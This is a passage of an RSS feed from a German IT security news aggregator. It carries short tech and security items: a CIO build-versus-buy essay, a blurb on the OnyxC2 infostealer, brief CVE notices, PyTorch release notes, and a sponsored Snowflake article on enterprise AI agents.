<p>The shift isn’t that those risks have disappeared. It’s where they sit within the decision’s architecture. They used to live in the column labelled “reasons not to start.” They now live in the “things to design for if you do” column. That’s a different conversation that requires a <a href="https://www.cio.com/article/4126383/how-the-growing-ai-workforce-is-changing-the-cio-role.html?utm=hybrid_search">different role from the CIO</a> than the one most of us were trained for.</p>



<p>In the previous era, the CIO’s value-add was largely defensive. Stop the bad build before it starts. Push the business toward the vendor that the company can hold accountable. Maintain the standardization that makes the environment sustainable. That work still matters, but it’s no longer sufficient.</p>



<p>The new value is architecture, not gatekeeping. It’s the ability to look at a workflow and tell the business whether buying it commoditizes a real differentiator, whether building it is operationally sustainable, what the maturity prerequisites are, and where the build needs to sit relative to the rest of the stack. It’s also the ability to govern <a href="https://www.cio.com/article/475444/democratizing-automation-with-citizen-developers-navigating-the-pitfalls-and-opportunities.html?utm=hybrid_search">citizen development</a> without trying to suppress it, because suppression is no longer a viable strategy. Business users will build with or without IT’s blessing and the CIO who makes that an adversarial relationship loses both the build and the governance.</p>



<h2 class="wp-block-heading">What this asks of the CIO function</h2>



<p>If the build-versus-buy question is no longer settled, the CIO role can’t remain settled either. So, a few things follow.</p>



<p>Architecture must come back to the center of the role. Not <a href="https://www.cio.com/article/4119297/how-to-get-your-enterprise-architecture-ready-for-agentic-ai.html?utm=hybrid_search">enterprise architecture</a> as the bureaucratic ritual it became in many organizations, but as the discipline of deciding which capabilities the business builds, buys, and how the two compose into something coherent. That work can’t be delegated to vendors or business units, both of whom have legitimate but partial views of the question.</p>



<p>Governance of citizen development becomes a real responsibility, not a residual one. The CIO who pretends business users aren’t building loses visibility into a category of growing risk. The CIO who entirely shuts down citizen development loses the ability to capture the value it can produce. The middle path of frameworks, sandboxes, security primitives, and lightweight standards, is harder to design and run than either extreme, and it’s now part of the job.</p>



<p>Talent strategy has to update. The CIO function has been hiring against a labor market that assumed a sharp line between business users and software developers. That line has become a gradient. Hiring needs to follow.</p>



<p>Most importantly, the CIO needs to be willing to retire advice that’s become reflex. The buy-default served the field well for a long time. The unwillingness to revisit it serves the field poorly now.</p>



<p>So the build-versus-buy question isn’t really about software but about which capabilities the business must control, which it can safely consume, and who owns the consequences when that choice proves wrong. The old default protected organizations from one kind of risk. Leaving it unexamined now creates another.</p>



<p>The economics have shifted and the default shouldn’t survive unexamined. The better question is no longer whether responsible CIOs should build or buy but whether they know which business capabilities are too important to leave to a vendor’s operating model.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OnyxC2 Stealer Uses Cloudflare-Fronted C2 to Exfiltrate Browser Data and Credentials]]></title>
<description><![CDATA[A new commercial-grade information stealer, marketed as OnyxC2, surfaced on cybercrime forums in early 2026 and demonstrates how commodity malware is increasingly packaged as a full-service product. For $250 a month buyers receive a web-based control panel, a payload builder, tiered licensing, an...]]></description>
<link>https://tsecurity.de/de/3592937/it-security-nachrichten/onyxc2-stealer-uses-cloudflare-fronted-c2-to-exfiltrate-browser-data-and-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592937/it-security-nachrichten/onyxc2-stealer-uses-cloudflare-fronted-c2-to-exfiltrate-browser-data-and-credentials/</guid>
<pubDate>Fri, 12 Jun 2026 11:08:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new commercial-grade information stealer, marketed as OnyxC2, surfaced on cybercrime forums in early 2026 and demonstrates how commodity malware is increasingly packaged as a full-service product. For $250 a month buyers receive a web-based control panel, a payload builder, tiered licensing, and even refund guarantees if a build is detected lowering the barrier for […]</p>
<p>The post <a href="https://gbhackers.com/onyxc2-stealer-uses-cloudflare-fronted-c2/">OnyxC2 Stealer Uses Cloudflare-Fronted C2 to Exfiltrate Browser Data and Credentials</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OnyxC2 Stealer Uses Cloudflare-Fronted C2 to Exfiltrate Browser Data and Credentials]]></title>
<description><![CDATA[A new commercial-grade information stealer, marketed as OnyxC2, surfaced on cybercrime forums in early 2026 and demonstrates how commodity malware is increasingly packaged as a full-service product. For $250 a month buyers receive a web-based control panel, a payload builder,…
Read more →
The pos...]]></description>
<link>https://tsecurity.de/de/3592934/it-security-nachrichten/onyxc2-stealer-uses-cloudflare-fronted-c2-to-exfiltrate-browser-data-and-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592934/it-security-nachrichten/onyxc2-stealer-uses-cloudflare-fronted-c2-to-exfiltrate-browser-data-and-credentials/</guid>
<pubDate>Fri, 12 Jun 2026 11:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new commercial-grade information stealer, marketed as OnyxC2, surfaced on cybercrime forums in early 2026 and demonstrates how commodity malware is increasingly packaged as a full-service product. For $250 a month buyers receive a web-based control panel, a payload builder,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/onyxc2-stealer-uses-cloudflare-fronted-c2-to-exfiltrate-browser-data-and-credentials/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/onyxc2-stealer-uses-cloudflare-fronted-c2-to-exfiltrate-browser-data-and-credentials/">OnyxC2 Stealer Uses Cloudflare-Fronted C2 to Exfiltrate Browser Data and Credentials</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Deploying VMware Cloud Foundation Private AI Services: Navigating Supervisor Architectures With and Without NSX]]></title>
<description><![CDATA[To help businesses develop generative AI applications securely within their private data centers, VCF Private AI Services is built directly into VMware Cloud Foundation (VCF). This embedded suite of services abstracts away the complexity of AI infrastructure, providing an end-to-end platform that...]]></description>
<link>https://tsecurity.de/de/3591102/downloads/deploying-vmware-cloud-foundation-private-ai-services-navigating-supervisor-architectures-with-and-without-nsx/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591102/downloads/deploying-vmware-cloud-foundation-private-ai-services-navigating-supervisor-architectures-with-and-without-nsx/</guid>
<pubDate>Thu, 11 Jun 2026 17:46:58 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="300" height="164" src="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/06/125595542_l.jpg?w=300" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" srcset="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/06/125595542_l.jpg 1170w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/06/125595542_l.jpg?resize=300,164 300w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/06/125595542_l.jpg?resize=768,419 768w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/06/125595542_l.jpg?resize=1024,559 1024w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/06/125595542_l.jpg?resize=600,328 600w" sizes="(max-width: 300px) 100vw, 300px"></div>
<p>To help businesses develop generative AI applications securely within their private data centers, VCF Private AI Services is built directly into VMware Cloud Foundation (VCF). This embedded suite of services abstracts away the complexity of AI infrastructure, providing an end-to-end platform that includes a Model Gallery, Model Runtime, Agent Builder, and Data Indexing capabilities for … <a href="https://blogs.vmware.com/cloud-foundation/2026/06/11/deploying-vmware-cloud-foundation-private-ai-services-navigating-supervisor-architectures-with-and-without-nsx/">Continued</a></p>
<p>The post <a href="https://blogs.vmware.com/cloud-foundation/2026/06/11/deploying-vmware-cloud-foundation-private-ai-services-navigating-supervisor-architectures-with-and-without-nsx/">Deploying VMware Cloud Foundation Private AI Services: Navigating Supervisor Architectures With and Without NSX</a> appeared first on <a href="https://blogs.vmware.com/cloud-foundation">VMware Cloud Foundation (VCF) Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla Open Policy & Advocacy Blog: A Handful of Companies Control the Web. AICOA Can Change That.]]></title>
<description><![CDATA[Mozilla Champions the Reintroduction of the American Innovation and Choice Online Act (AICOA)
Today, only a handful of tech companies shape the online experience for the more than 300 million internet users in America. This concentration of power is exactly why we need legislation that advances c...]]></description>
<link>https://tsecurity.de/de/3590865/tools/mozilla-open-policy-advocacy-blog-a-handful-of-companies-control-the-web-aicoa-can-change-that/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590865/tools/mozilla-open-policy-advocacy-blog-a-handful-of-companies-control-the-web-aicoa-can-change-that/</guid>
<pubDate>Thu, 11 Jun 2026 16:24:26 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>Mozilla Champions the Reintroduction of the American Innovation and Choice Online Act (AICOA)</strong></p>
<p>Today, only a handful of tech companies shape the online experience for the more than 300 million internet users in America. This concentration of power is exactly why we need legislation that advances competition and user choice.  It’s all the more urgent as AI transforms not just the tools that people use, but also <a href="https://blog.mozilla.org/en/mozilla/rewiring-mozilla-ai-and-web/">magnifies the competitive inequities</a> underlying the web itself.</p>
<p>The American Innovation and Choice Online Act (AICOA) is bipartisan legislation designed to curb harmful gatekeeper behaviors of the biggest tech platforms. The bill does so by prohibiting dominant platforms from unfairly preferencing their own products, discriminating against tech competitors, and preventing interoperability — all practices that stop the best product winning and stifle consumer control. The goal is straightforward: companies should compete based on the quality of their products, not by leveraging anticompetitive tactics.</p>
<p>As the builder and operator of the Firefox browser and the browser engine <a href="https://blog.mozilla.org/netpolicy/2026/03/23/competition-innovation-and-the-future-of-the-web/">Gecko</a>, Mozilla has firsthand experience with the impact of the exclusionary practices AICOA seeks to prevent. For example, <a href="https://research.mozilla.org/browser-competition/over-the-edge-the-use-of-design-tactics-to-undermine-browser-choice/">deceptive design tactics</a> deployed by operating systems make it difficult for people to install and keep Firefox as their preferred browser. Browsers are the portal through which people access the open web, and users should define that interaction. AICOA would help limit the ability of operating systems to steer users toward affiliated products through deceptive design choices. Ensuring meaningful user choice online is not just about variety; it reflects values and individual preferences. Openness and innovation thrives when the web is built around platforms that serve people, not the other way round.</p>
<p>Browser engines, while lesser-known, are among the most complex and consequential pieces of infrastructure on the modern internet, impacting user-focused innovations in privacy, security, speed, and more. Gecko is one of only three widely used engines and the only independent browser engine. The importance of that competitive counterweight cannot be underestimated. When platform owners favor their own vertically integrated products, independent challengers face barriers that have nothing to do with product quality and everything to do with a monopolized market.</p>
<p>It’s important to recognize that antitrust reform can make the internet <i>more</i> private and secure than it is today, as we’ve consistently <a href="https://blog.mozilla.org/en/mozilla/calling-for-antitrust-reform/">emphasized</a>. For example, in 2021, Firefox was <a href="https://blog.mozilla.org/security/2021/02/23/total-cookie-protection/">at the forefront of developing technology against cross-site tracking</a>, but could not release the technology to Firefox users on iOS because of app store rules preferring Apple’s own browser engine, blocking alternatives like<a href="https://blog.mozilla.org/netpolicy/2026/03/23/competition-innovation-and-the-future-of-the-web/"> Gecko</a>.</p>
<p>We’re champions of AICOA and look forward to working with members of Congress to push this legislation forward and tackle longstanding anticompetitive practices. Mozilla thanks Senators Grassley and Klobuchar for their leadership in advancing competition. A thriving tech ecosystem requires an open, fair, and competitive market where innovative services can compete on merit and people can control their own experiences online.</p>
<p>The post <a href="https://blog.mozilla.org/netpolicy/2026/06/11/a-handful-of-companies-control-the-web-aicoa-can-change-that/">A Handful of Companies Control the Web. AICOA Can Change That.</a> appeared first on <a href="https://blog.mozilla.org/netpolicy">Open Policy &amp; Advocacy</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nous Research Ships Hermes Agent Profile Builder: Identity, Model, Skills, and MCP Servers in One Dashboard Flow]]></title>
<description><![CDATA[The Hermes Agent dashboard now builds complete agent profiles in one flow, replacing multi-step CLI setup for users.
The post Nous Research Ships Hermes Agent Profile Builder: Identity, Model, Skills, and MCP Servers in One Dashboard Flow appeared first on MarkTechPost.]]></description>
<link>https://tsecurity.de/de/3590080/ai-nachrichten/nous-research-ships-hermes-agent-profile-builder-identity-model-skills-and-mcp-servers-in-one-dashboard-flow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590080/ai-nachrichten/nous-research-ships-hermes-agent-profile-builder-identity-model-skills-and-mcp-servers-in-one-dashboard-flow/</guid>
<pubDate>Thu, 11 Jun 2026 12:03:33 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Hermes Agent dashboard now builds complete agent profiles in one flow, replacing multi-step CLI setup for users.</p>
<p>The post <a href="https://www.marktechpost.com/2026/06/11/nous-research-ships-hermes-agent-profile-builder-identity-model-skills-and-mcp-servers-in-one-dashboard-flow/">Nous Research Ships Hermes Agent Profile Builder: Identity, Model, Skills, and MCP Servers in One Dashboard Flow</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46618 | Fission up to 1.22.x pkg/builder/builder.go os command injection (GHSA-7pjr-qpvh-m339 / EUVD-2026-36093)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Fission up to 1.22.x. Affected by this issue is some unknown functionality of the file pkg/builder/builder.go. Executing a manipulation can lead to os command injection.

This vulnerability appears as CVE-2026-46618. The attack may be p...]]></description>
<link>https://tsecurity.de/de/3589466/sicherheitsluecken/cve-2026-46618-fission-up-to-122x-pkgbuilderbuildergo-os-command-injection-ghsa-7pjr-qpvh-m339-euvd-2026-36093/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589466/sicherheitsluecken/cve-2026-46618-fission-up-to-122x-pkgbuilderbuildergo-os-command-injection-ghsa-7pjr-qpvh-m339-euvd-2026-36093/</guid>
<pubDate>Thu, 11 Jun 2026 05:52:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/fission">Fission up to 1.22.x</a>. Affected by this issue is some unknown functionality of the file <em>pkg/builder/builder.go</em>. Executing a manipulation can lead to os command injection.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-46618">CVE-2026-46618</a>. The attack may be performed from remote. There is no available exploit.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.13.0-rc1: [release 2.13] Apply Release only changes to 2.13 branch (#186959)]]></title>
<description><![CDATA[[release 2.13] Apply Release only changes to 2.13 branch

Release-only changes for the release/2.13 branch cut, produced by
running scripts/release/apply-release-changes.sh. The script repoints
reusable workflows and composite actions from @main to @release/2.13,
rewrites templates to release/2.1...]]></description>
<link>https://tsecurity.de/de/3588809/downloads/v2130-rc1-release-213-apply-release-only-changes-to-213-branch-186959/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588809/downloads/v2130-rc1-release-213-apply-release-only-changes-to-213-branch-186959/</guid>
<pubDate>Wed, 10 Jun 2026 22:16:55 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>[release 2.13] Apply Release only changes to 2.13 branch</li>
</ul>
<p>Release-only changes for the release/2.13 branch cut, produced by<br>
running scripts/release/apply-release-changes.sh. The script repoints<br>
reusable workflows and composite actions from <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/main/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/main">@main</a> to @release/2.13,<br>
rewrites templates to release/2.13 (with checkout_pr_head=False so PRs<br>
build the merge base rather than the PR head), pins the XLA checkout to<br>
the r2.13 branch, pins the disabled/unstable jobs and disabled-tests S3<br>
JSON blobs to fixed versionIds, sets RELEASE_VERSION_TAG=2.13 for the<br>
workflow-regeneration lint check, and drops the pull_request-specific<br>
checkout ref from the linux binary build/test workflows.</p>
<p>Only files that are tracked in release/2.13 are included. The 2.12 PR<br>
additionally touched .ci/manywheel/build_cuda.sh and a few workflow<br>
files (torchbench/nitpicker/quantization-periodic) that are not tracked<br>
in this checkout, so they are intentionally omitted here.</p>
<p>Test Plan:<br>
Ran the release script and linter:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="DRY_RUN=disabled ./scripts/release/apply-release-changes.sh
lintrunner -a"><pre class="notranslate"><code>DRY_RUN=disabled ./scripts/release/apply-release-changes.sh
lintrunner -a
</code></pre></div>
<p>lintrunner reported only pre-existing ACTIONLINT shellcheck warnings on<br>
generated workflow lines unrelated to the release-version edits, and made<br>
no changes to the staged files. Verified every staged hunk is a<br>
release-only edit (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/main/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/main">@main</a> -&gt; @release/2.13, main -&gt; release/2.13, XLA<br>
r2.13 pin, S3 versionId pins, RELEASE_VERSION_TAG=2.13, and the<br>
pull_request ref removal) with no submodule or unrelated changes.</p>
<p>This PR was authored with the assistance of Claude Code.</p>
<ul>
<li>[release 2.13] Pin Linux manywheel builder docker images</li>
</ul>
<p>Release builds should use a fixed, reproducible build toolchain instead<br>
of the floating builder image tags that main tracks (e.g.<br>
pytorch/manylinux2_28-builder:cuda12.6). For 2.12 the binary build<br>
workflows resolved the image dynamically via calculate-docker-image; for<br>
2.13 we freeze that resolved image as a literal pin.</p>
<p>The pin is applied in the generator (generate_binary_build_matrix.py)<br>
rather than in the generated YAML directly, so re-running<br>
.github/regenerate.sh (and the lint job that asserts the generated files<br>
are up to date) reproduces the pinned tags. wheel_container_image_tag_prefix()<br>
appends the pin only for the linux manywheel OSes (linux, linux-aarch64,<br>
linux-s390x), since only those builds run inside these containers;<br>
windows and macos keep the plain tag prefix.</p>
<p>The pin suffix is the .ci/docker tree hash, f38ba0b10220982e39441d29d203d803a2b56c92<br>
(git rev-parse HEAD:.ci/docker), which is exactly the tag that<br>
.github/actions/binary-docker-build (and the s390x equivalent) publish<br>
as ${prefix}-${CI_FOLDER_SHA}. It matches the image already published on<br>
Docker Hub, e.g.<br>
pytorch/manylinux2_28_aarch64-builder:cpu-aarch64-f38ba0b10220982e39441d29d203d803a2b56c92</p>
<p>Test Plan:<br>
Regenerated the workflows in release mode and verified the result:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="RELEASE_VERSION_TAG=2.13 python3 .github/scripts/generate_ci_workflows.py"><pre class="notranslate"><code>RELEASE_VERSION_TAG=2.13 python3 .github/scripts/generate_ci_workflows.py
</code></pre></div>
<ul>
<li>Every <code>image:</code> and matrix <code>docker_image_tag_prefix</code> in the three linux<br>
manywheel generated workflows now carries the <code>-f38ba0b...</code> suffix<br>
(cpu, cpu-aarch64, cuda12.6/13.0/13.2, rocm7.1/7.2, xpu, cpu-s390x);<br>
no linux builder image remains floating.</li>
<li>Windows and macos generated workflows are unchanged (plain <code>cpu</code>,<br>
<code>cuda12.6</code>, ...), confirming the pin is linux-only.</li>
<li>Re-running the generator a second time produced byte-identical output<br>
(md5sum unchanged), so the regeneration/lint up-to-date check is<br>
stable.</li>
</ul>
<p>Note: the local linters that shell out to <code>uv</code> could not run in this<br>
environment; the change was format-checked manually.</p>
<p>This PR was authored with the assistance of Claude Code.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hands on: iPadOS 27's shortcut builder creates automations from plain English]]></title>
<description><![CDATA[Apple's Shortcuts generator has always been powerful, but iPadOS 27 finally makes it easier for everybody to use. Here's how Apple Intelligence turns plain-language prompts into workflows, and what to look out for.Apple lets you vibe-code shortcuts in iPadOS 27Apple Intelligence makes Shortcuts f...]]></description>
<link>https://tsecurity.de/de/3588417/ios-mac-os/hands-on-ipados-27s-shortcut-builder-creates-automations-from-plain-english/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588417/ios-mac-os/hands-on-ipados-27s-shortcut-builder-creates-automations-from-plain-english/</guid>
<pubDate>Wed, 10 Jun 2026 18:59:15 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's Shortcuts generator has always been powerful, but <a href="https://appleinsider.com/inside/ipados-27" title="iPadOS 27" data-kpt="1">iPadOS 27</a> finally makes it easier for everybody to use. Here's how Apple Intelligence turns plain-language prompts into workflows, and what to look out for.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67905-143152-B0697CEF-1043-4BC5-A6E4-BA7F0DDFD1B0-xl.jpg" alt="Colorful rounded rectangles form a soft gradient grid background, with a central white card displaying the text What do you want your shortcut to do and Compose a message underneath" height="738"><span>Apple lets you vibe-code shortcuts in iPadOS 27</span></div><br><a href="https://appleinsider.com/inside/apple-intelligence" title="Apple Intelligence" data-kpt="1">Apple Intelligence</a> makes Shortcuts far easier to approach in iPadOS 27. Users can describe a task in plain language, and the app generates a workflow based on that request.<br><br>Instead of hunting through actions and connecting them one by one, users can start with a prompt and refine the result inside the existing editor. The change addresses one of the biggest challenges that has limited Shortcuts for years.<br><br>Shortcuts can automate tasks across apps, process information, manage files, and control smart-home devices. Building custom workflows often requires users to understand actions, variables, inputs, and outputs before they can create something useful.<br><br><br> <a href="https://appleinsider.com/articles/26/06/10/hands-on-ipados-27s-shortcut-builder-creates-automations-from-plain-english?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244617?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is about to replace the interface. Business leaders aren’t ready]]></title>
<description><![CDATA[Presented by Snowflake As AI agents become capable of reasoning across systems and taking action, software is evolving from something employees operate into something that understands intent. Instead of navigating disparate applications and dashboards, a single system will increasingly ask: What ...]]></description>
<link>https://tsecurity.de/de/3588149/it-nachrichten/ai-is-about-to-replace-the-interface-business-leaders-arent-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588149/it-nachrichten/ai-is-about-to-replace-the-interface-business-leaders-arent-ready/</guid>
<pubDate>Wed, 10 Jun 2026 17:21:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by Snowflake </i></p><hr><p>As AI agents become capable of reasoning across systems and taking action, software is evolving from something employees operate into something that understands intent. Instead of navigating disparate applications and dashboards, a single system will increasingly ask: What are you trying to accomplish?</p><p>That sounds like a user experience breakthrough. It is. But the more important implication is organizational. When software no longer relies on humans to provide context, companies can no longer assume that knowledge lives in employees' heads or is buried inside disconnected applications. The company itself has to become machine-readable.</p><p>The winners in the AI era won't simply deploy more intelligent models. They'll build the data foundations, semantic context, and governance frameworks that allow machines to understand how the business works and act on that understanding with confidence.</p><h2>Context is becoming infrastructure </h2><p>For years, companies treated context as a human layer on top of data. The data platform held the records, then the BI tool visualized them, and the analyst interpreted them. And finally, the business leader made the judgment call. Agents collapse those layers.</p><p>When an executive asks, “Why is customer churn rising in our enterprise segment?” an effective agent needs to know far more than where the customer data lives. It needs to understand how the company defines churn, which accounts count as enterprise, whether product usage data is more reliable than survey data, which renewal events matter, what the sales team has logged, what support tickets suggest, and whether the answer differs by geography or product line.</p><p>This is why semantics — the definitions, relationships, rules, and assumptions that give data meaning — are moving from a technical concern to a boardroom issue. A semantic layer used to sound like plumbing for data teams. In an agentic enterprise, it becomes the shared language between humans and machines.</p><p>If every department teaches its own agent a different version of the business, companies will get inaccuracy at scale. The organizations that pull ahead will be the ones that create a common business knowledge base: consistent definitions, governed access, documented workflows, clear lineage, and enough flexibility to evolve as the business changes. In that world, context is treated as infrastructure, rather than just a nice-to-have.</p><h2>From dashboards to decisions </h2><p>The first wave of enterprise AI largely gave us assistants and copilots that answer questions. Useful, but still limited. You ask a question, get a response, and then return to the work of stitching systems together yourself.</p><p>The next era of AI will be different. Agents will move beyond coordinating answers, and start getting actual work done. A sales leader starting the day will not need to open a CRM, a forecasting tool, a support dashboard, and a Slack thread to understand what changed overnight. They will simply ask an agent what needs attention. The agent will identify which accounts are at risk, explain why, summarize recent customer interactions, draft follow-up actions, and perhaps initiate the next workflow.</p><p>The dashboard does not disappear because charts become useless. It disappears because static reporting becomes too slow for how businesses need to operate. The center of gravity shifts from “show me what happened” to “help me decide what to do next.”</p><h2>The new governance problem: agents that act </h2><p>As long as AI is mostly answering questions, governance is about controlling what it can access. That is already difficult. Employees have different permissions, sensitive data needs protection, and answers must be traceable to trusted sources. As agents begin taking action, governance becomes even more consequential.</p><p>It’s one thing for an agent to summarize a customer complaint. It’s another for it to issue a refund, reorder inventory, or send an email to a customer. This is where many companies will be tempted to choose between two imperfect paths.</p><p>One path is to tightly constrain agents from the start: define the data sources, tools, workflows, and actions they can access. This is easier to manage and measure. It also risks limiting the creativity of employees who understand their workflows best.</p><p>The other path is to let teams experiment freely: connect agents to the tools and data they use every day, and allow new use cases to emerge organically. This can produce faster adoption and unexpected innovation. It can also create real risk: stale data, inappropriate access, duplicated workflows, runaway costs, or automated actions no one fully understands.</p><p>The right answer is not maximum control or maximum freedom. It’s to prioritize governed flexibility. Companies need architectures where governance is embedded from the beginning. An agent should know not only what it can read, but what it can do, when it needs approval, how its reasoning is inspected, and how its performance is evaluated over time. In other words, governance cannot be a review meeting after the pilot. It has to be part of the system design.</p><h2>The boundary between builder and user is collapsing </h2><p>One of the least appreciated consequences of agentic AI is that it will blur the line between people who use software and people who create it. When employees can describe a workflow in natural language and have an agent help build it, software development becomes less confined to engineering teams. A marketer can create a campaign analysis workflow. A finance manager can automate variance explanations. An HR leader can build a policy assistant. A support manager can design a triage process.</p><p>These employees are not becoming software engineers in the traditional sense, but they are becoming builders. That changes the talent model. Technical fluency will matter more because employees need to understand what’s possible, what’s risky, and how to evaluate an AI-generated result. Judgment becomes the most important skill.</p><p>The winners will be the people who know how to ask better questions, inspect evidence, refine workflows, and combine domain expertise with enough technical understanding to move from idea to execution.</p><p>For business leaders, this means AI adoption extends beyond an IT rollout, and is actually an organizational redesign. The distance between insight and action will shrink, and companies will need to rethink who is empowered to build, approve, and operate the workflows that run the business.</p><h2>Software economics will change too </h2><p>The shift from interfaces to agents will also challenge how companies buy and measure software, and change how software is priced. Per-seat licensing is giving way to consumption models, where costs reflect actual usage. For most organizations this is a better deal. You pay for value delivered, not licenses that may sit idle.</p><p>But it also changes the accountability calculus. When costs are fixed per seat, budget conversations happen once a year. When costs scale with usage, they require continuous oversight. Without visibility into how agents are used and what they produce, costs can rise quickly.</p><p>The answer is to build measurement in from the start, connecting AI usage to business outcomes, whether that is deals closed, tickets resolved, or cycle times reduced.The companies that succeed will treat AI cost management as part of operational excellence, not procurement cleanup. The question should not be, “How many tokens did we use?” It should be, “What business outcome did that intelligence produce?”</p><h2>Your customers may stop using your interface </h2><p>While the internal implications of agents are significant, the external ones may be even larger. Today, companies obsess over the customer experience inside their applications: the homepage, the navigation, the checkout flow, the dashboard, the mobile screen. Those things will still matter. But increasingly, customers may interact with businesses through their own agents rather than directly through a company’s app or website.</p><p>If a procurement agent compares suppliers, a travel agent books a trip, or a financial agent evaluates products, the customer may never see the interface a company spent years perfecting. The agent will care less about visual design and more about whether the company’s data, policies, pricing, inventory, documentation, and transaction systems are accessible, structured, trustworthy, and machine-readable.</p><p>That means the competitive surface area changes. A company’s brand may still be emotional, but its operational interface will increasingly be data. Businesses that expose confusing, inconsistent, or poorly governed information will be harder for agents to work with. Businesses with clean semantics, reliable APIs, governed data, and clear policies will become easier to choose, easier to transact with, and easier to trust.</p><p>The interface does not vanish only inside the enterprise. It may vanish between enterprises, too.</p><h2>The real AI readiness test </h2><p>Most executives know they need an AI strategy, but fewer have internalized what that really requires. AI readiness is not the number of pilots launched, the number of models tested, or the number of employees with access to a chatbot. It is whether the organization’s knowledge, data, permissions, workflows, and decision logic are ready for machines to reason over them safely.</p><p>For decades, enterprise software forced humans to become translators between business intent and machine logic. AI is reversing that relationship. Machines are beginning to adapt to human intent. But they can only do that if the enterprise has done the work to make its own context legible.</p><p>The future of software is not another screen. It is a system that understands the business well enough to help run it. And that means the next great interface will not look like an interface at all.</p><p><i>Baris Gultekin is VP of AI at Snowflake.</i></p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2019-25744 | Popup-Builder Popup Builder Plugin 3.49 on WordPress POST post.php post_title cross site scripting (Exploit 47518)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in Popup-Builder Popup Builder Plugin 3.49 on WordPress. Affected by this vulnerability is an unknown functionality of the file post.php of the component POST Handler. Such manipulation of the argument post_title leads to cross site scr...]]></description>
<link>https://tsecurity.de/de/3587724/sicherheitsluecken/cve-2019-25744-popup-builder-popup-builder-plugin-349-on-wordpress-post-postphp-posttitle-cross-site-scripting-exploit-47518/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587724/sicherheitsluecken/cve-2019-25744-popup-builder-popup-builder-plugin-349-on-wordpress-post-postphp-posttitle-cross-site-scripting-exploit-47518/</guid>
<pubDate>Wed, 10 Jun 2026 15:10:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
